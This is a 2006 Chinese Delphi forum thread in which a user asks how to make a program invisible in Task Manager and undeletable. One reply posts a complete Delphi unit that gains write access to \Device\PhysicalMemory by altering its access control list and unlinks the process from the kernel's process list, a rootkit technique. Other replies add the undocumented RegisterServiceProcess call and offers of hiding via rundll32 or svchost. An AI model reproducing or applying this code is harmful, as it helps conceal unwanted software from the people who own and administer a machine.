如何让我的程序在"任务管理器"的进程中看不到(有点难啊..........)(157分)

dafu2 · 2006-05-10

我想写一个程序,不希望别人"停止"或"删除". 比如在"任务管理器"中看不到程序的进程, 即使用户找到该程序文件,也不让删除.

dafu2 · 2006-05-10

帮帮我啊,各位大哥........

luzhouman · 2006-05-10

考不考虑用ShellExecuteHook

dafu2 · 2006-05-10

to luzhouman:   ShellExecuteHook 是咋搞的啊? 发个DEMO,或则贴点代码让我学习学习吧!

luzhouman · 2006-05-10

baidu 上搜索一下ShellExecuteHook, 很多

dafu2 · 2006-05-10

有没有简单一点的,看得有点晕啊 Email:gxhuangna@126.com

大唐电信 · 2006-05-10

在你的程序里调用下面单元文件的函数就可以隐藏你的进程。 unit HideProcess; interface function MyHideProcess: Boolean; implementation uses  Windows, SysUtils, Variants, Classes, AclAPI, accCtrl; type  NTSTATUS = LongInt; const  //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);  OBJ_INHERIT = $00000002;  OBJ_PERMANENT = $00000010;  OBJ_EXCLUSIVE = $00000020;  OBJ_CASE_INSENSITIVE = $00000040;  OBJ_OPENIF = $00000080;  OBJ_OPENLINK = $00000100;  OBJ_KERNEL_HANDLE = $00000200;  OBJ_VALID_ATTRIBUTES = $000003F2; type  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;  IO_STATUS_BLOCK = record    Status: NTSTATUS;    FObject: DWORD;  end;  PUNICODE_STRING = ^UNICODE_STRING;  UNICODE_STRING = record    Length: Word;    MaximumLength: Word;    Buffer: PWideChar;  end;  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;  OBJECT_ATTRIBUTES = record    Length: DWORD;    RootDirectory: Pointer;    ObjectName: PUNICODE_STRING;    Attributes: DWORD;    SecurityDescriptor: Pointer;    SecurityQualityOfService: Pointer;  end;  TZwOpenSection = function(SectionHandle: PHandle;    DesiredAccess: ACCESS_MASK;    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;    SourceString: PWideChar); stdcall; var  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;  ZwOpenSection: TZwOpenSection = nil;  g_hNtDLL: THandle = 0;  g_pMapPhysicalMemory: Pointer = nil;  g_hMPM: THandle = 0;  g_hMPM2: THandle = 0;  g_osvi: OSVERSIONINFO;  b_hide: Boolean = false; //--------------------------------------------------------------------------- function InitNTDLL: Boolean; begin  g_hNtDLL := LoadLibrary('ntdll.dll');  if 0 = g_hNtDLL then  begin    Result := false;    Exit;  end;  RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');  ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');  Result := True; end; //--------------------------------------------------------------------------- procedure CloseNTDLL; begin  if (0 <> g_hNtDLL) then    FreeLibrary(g_hNtDLL);  g_hNtDLL := 0; end; //--------------------------------------------------------------------------- procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle); var  pDacl: PACL;  pSD: PPSECURITY_DESCRIPTOR;  pNewDacl: PACL;  dwRes: DWORD;  ea: EXPLICIT_ACCESS; begin  pDacl := nil;  pSD := nil;  pNewDacl := nil;  dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);  if ERROR_SUCCESS <> dwRes then  begin    if Assigned(pSD) then      LocalFree(Hlocal(pSD^));    if Assigned(pNewDacl) then      LocalFree(HLocal(pNewDacl));  end;  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));  ea.grfAccessPermissions := SECTION_MAP_WRITE;  ea.grfAccessMode := GRANT_ACCESS;  ea.grfInheritance := NO_INHERITANCE;  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;  ea.Trustee.ptstrName := 'CURRENT_USER';  dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);  if ERROR_SUCCESS <> dwRes then  begin    if Assigned(pSD) then      LocalFree(Hlocal(pSD^));    if Assigned(pNewDacl) then      LocalFree(HLocal(pNewDacl));  end;  dwRes := SetSecurityInfo  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);  if ERROR_SUCCESS <> dwRes then  begin    if Assigned(pSD) then      LocalFree(Hlocal(pSD^));    if Assigned(pNewDacl) then      LocalFree(HLocal(pNewDacl));  end; end; //--------------------------------------------------------------------------- function OpenPhysicalMemory: THandle; var  status: NTSTATUS;  physmemString: UNICODE_STRING;  attributes: OBJECT_ATTRIBUTES;  PhyDirectory: DWORD; begin  g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);  GetVersionEx(g_osvi);  if (5 <> g_osvi.dwMajorVersion) then  begin    Result := 0;    Exit;  end;  case g_osvi.dwMinorVersion of    0: PhyDirectory := $30000;    1: PhyDirectory := $39000;  else    begin      Result := 0;      Exit;    end;  end;  RtlInitUnicodeString(@physmemString, '/Device/PhysicalMemory');  attributes.Length := SizeOf(OBJECT_ATTRIBUTES);  attributes.RootDirectory := nil;  attributes.ObjectName := @physmemString;  attributes.Attributes := 0;  attributes.SecurityDescriptor := nil;  attributes.SecurityQualityOfService := nil;  status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  if (status = STATUS_ACCESS_DENIED) then  begin    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);    SetPhyscialMemorySectionCanBeWrited(g_hMPM);    CloseHandle(g_hMPM);    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  end;  if not (LongInt(status) >= 0) then  begin    Result := 0;    Exit;  end;  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,    FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);  if (g_pMapPhysicalMemory = nil) then  begin    Result := 0;    Exit;  end;  Result := g_hMPM; end; //--------------------------------------------------------------------------- function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer; var  VAddr, PGDE, PTE, PAddr, tmp: DWORD; begin  VAddr := DWORD(addr); //  PGDE := BaseAddress[VAddr shr 22];  PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.  if 0 = (PGDE and 1) then  begin    Result := nil;    Exit;  end;  tmp := PGDE and $00000080;  if (0 <> tmp) then  begin    PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);  end  else  begin    PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000)); //    PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];    PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.    if (0 = (PTE and 1)) then    begin      Result := nil;      Exit;    end;    PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);    UnmapViewOfFile(Pointer(PGDE));  end;  Result := Pointer(PAddr); end; //--------------------------------------------------------------------------- function GetData(addr: Pointer): DWORD; var  phys, ret: DWORD;  tmp: PDWORD; begin  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,    phys and $FFFFF000, $1000));  if (nil = tmp) then  begin    Result := 0;    Exit;  end; //  ret := tmp[(phys and $FFF) shr 2];  ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.  UnmapViewOfFile(tmp);  Result := ret; end; //--------------------------------------------------------------------------- function SetData(addr: Pointer; data: DWORD): Boolean; var  phys: DWORD;  tmp: PDWORD; begin  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));  if (nil = tmp) then  begin    Result := false;    Exit;  end; //  tmp[(phys and $FFF) shr 2] := data;  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // Modify by dot.  UnmapViewOfFile(tmp);  Result := TRUE; end; //--------------------------------------------------------------------------- {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) begin ExitProcess(0); return 1 ; end } //--------------------------------------------------------------------------- function YHideProcess: Boolean; var  thread, process: DWORD;  fw, bw: DWORD; begin //  SetUnhandledExceptionFilter(exeception);  if (FALSE = InitNTDLL) then  begin    Result := FALSE;    Exit;  end;  if (0 = OpenPhysicalMemory) then  begin    Result := FALSE;    Exit;  end;  thread := GetData(Pointer($FFDFF124)); //kteb  process := GetData(Pointer(thread + $44)); //kpeb  if (0 = g_osvi.dwMinorVersion) then  begin    fw := GetData(Pointer(process + $A0));    bw := GetData(Pointer(process + $A4));    SetData(Pointer(fw + 4), bw);    SetData(Pointer(bw), fw);    Result := TRUE;  end  else if (1 = g_osvi.dwMinorVersion) then  begin    fw := GetData(Pointer(process + $88));    bw := GetData(Pointer(process + $8C));    SetData(Pointer(fw + 4), bw);    SetData(Pointer(bw), fw);    Result := TRUE;  end  else  begin    Result := False;  end;  CloseHandle(g_hMPM);  CloseNTDLL; end; function MyHideProcess: Boolean; begin  if not b_hide then  begin    b_hide := YHideProcess;  end;  Result := b_hide; end; end.

fxh7622 · 2006-05-10

标记一下! 呵呵! 我只知道用DDK来做呵呵!

精灵猪 · 2006-05-11

大唐电信你的做法在64位的机器上还是可以看的到进程的

dafu2 · 2006-05-11

大唐电信: procedure TForm1.FormCreate(Sender: TObject); begin  MyHideProcess; end; 还是隐藏不了啊!(TForm1.show一样不行啊)

大唐电信 · 2006-05-11

to 精灵猪 你说的是64位的操作系统吧，这个我没试过。但64位的CPU是可以的，我用就是64位的AMD。 to dafu2 楼主你在试试，应该是可以的，我用的没问题，在任务管理器的进程里找不到的。

dali2000 · 2006-05-11

上面的方法行不行呀

tenderghost · 2006-05-12

怎么不行啊？我的系统是2000，调用了MyHideProcess还是没有隐藏。

delphidoc · 2006-05-12

我正和你的要求正相反，我的程序有时就自动在任务管理器里消失了（程序还在正常运行），真是莫名其妙，我还在为这个发愁呢！

yitang · 2006-05-13

我也试了一下，调用了MyHideProcess没有隐藏。winxp+sp2, delphi2006 这里出了问题： status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  if (status = STATUS_ACCESS_DENIED) then  begin    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);    SetPhyscialMemorySectionCanBeWrited(g_hMPM);    CloseHandle(g_hMPM);    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  end;  if not (LongInt(status) >= 0) then  begin    Result := 0;    Exit;  end; status是个负数，就退出了

dafu2 · 2006-05-15

看来这个问题还是有价值,等问题解决的再揭贴!

madic · 2006-05-15

引用以前的贴： 使用 RegisterServiceProcess(ProcessID:Long,Type:Long)函数 该函数存在于Kernel32.dll中. function RegisterServiceProcess(a:longint;const b:longint):dword;stdcall;far;external 'Kernel32.dll' name 'RegisterServiceProcess'; ddd:=GetCurrentProcessId; if (RegisterServiceProcess(ddd,1)=0) then showmessage('error!'); 用未公开函数RegisterServiceProcess #define RSP_SIMPLE_SERVICE 1 #define RSP_UNREGISTER_SERVICE 0 //下面代码为隐藏 DWORD dwID,redserv; dwID = GetCurrentProcessId(); regserv = RegisterServiceProcess(pid,RSP_SIMPLE_SERVICE); //恢复隐藏 dwID= GetCurrentProcessId() regserv = RegisterServiceProcess(pid,RSP_UNREGISTER_SERVICE);

诸葛白痴 · 2006-05-15

哈哈，楼上大唐电信的兄弟那段代码好熟啊，应该标明一下出处比较好，毕竟dot兄辛苦的从VC里改过来嘛 上面那段代码是可行的，支持win2k、xp，但听说2003不支持，我没环境测，全部源码可以到这下载 http://3500.tomore.com

jsjxuwenjun · 2006-07-19

影藏进程方式很多,可以参考插件技术. 通过系统服务启动比如(rundll32.exe,svchost.exe)等等. 我有现成的DEMO,发给你.请查收!

dafu2 · 2006-07-19

多人接受答案了。

如何让我的程序在"任务管理器"的进程中看不到(有点难啊..........)(157分)

dafu2

Unregistered / Unconfirmed

dafu2

Unregistered / Unconfirmed

luzhouman

Unregistered / Unconfirmed

dafu2

Unregistered / Unconfirmed

luzhouman

Unregistered / Unconfirmed

dafu2

Unregistered / Unconfirmed

大唐电信

Unregistered / Unconfirmed

fxh7622

Unregistered / Unconfirmed

精灵猪

Unregistered / Unconfirmed

dafu2

Unregistered / Unconfirmed

大唐电信

Unregistered / Unconfirmed

dali2000

Unregistered / Unconfirmed

tenderghost

Unregistered / Unconfirmed

delphidoc

Unregistered / Unconfirmed

yitang

Unregistered / Unconfirmed

dafu2

Unregistered / Unconfirmed

madic

Unregistered / Unconfirmed

诸葛白痴

Unregistered / Unconfirmed

jsjxuwenjun

Unregistered / Unconfirmed

dafu2

Unregistered / Unconfirmed

Similar threads